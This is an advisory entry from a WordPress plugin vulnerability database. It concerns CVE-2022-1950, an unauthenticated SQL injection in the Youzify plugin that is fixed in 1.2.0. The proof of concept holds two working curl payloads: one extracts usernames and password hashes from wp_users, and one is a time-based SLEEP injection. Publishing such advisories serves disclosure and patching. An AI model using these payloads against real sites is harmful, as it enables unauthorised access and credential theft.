Youzify < 1.2.0 – Unauthenticated SQLi | CVE 2022-1950 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection

Proof of Concept

curl 'https://example.com/wp-admin/admin-ajax.php' \
    --data "action=youzify_media_pagination&data[type]=photos&page=1&data[group_id]=1 UNION ALL SELECT (SELECT CONCAT(user_login,CHAR(0x3a),user_pass) from wp_users),2,3,4-- -"

time curl 'https://example.com/wp-admin/admin-ajax.php' \
    --data "action=youzify_media_pagination&data[type]=photos&page=1&data[group_id]=(SELECT 7958 FROM (SELECT(SLEEP(5)))XVfJ)"

Affects Plugins

Fixed in 1.2.0

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

4352283f-dd43-4827-b417-0c55d0f4637d

Timeline

Publicly Published

2022-07-11 (about 1 years ago)

Added

2022-07-11 (about 1 years ago)

Last Updated

2023-04-11 (about 1 years ago)

Other

Published

Title

Published

2014-08-01

Title

ForumConverter - SQL Injection

Published

2014-08-01

Title

Editorial Calendar 2.6 - Post Query Multiple Filter SQL Injection

Published

2016-11-28

Title

Product Catalog 8 1.2 - Unauthenticated SQL Injection

Published

2014-08-01

Title

Menu Creator <= 1.1.7 - SQL Injection

Published

2022-12-27

Title

CBX Petition for WordPress <= 1.0.3 - Unauthenticated SQLi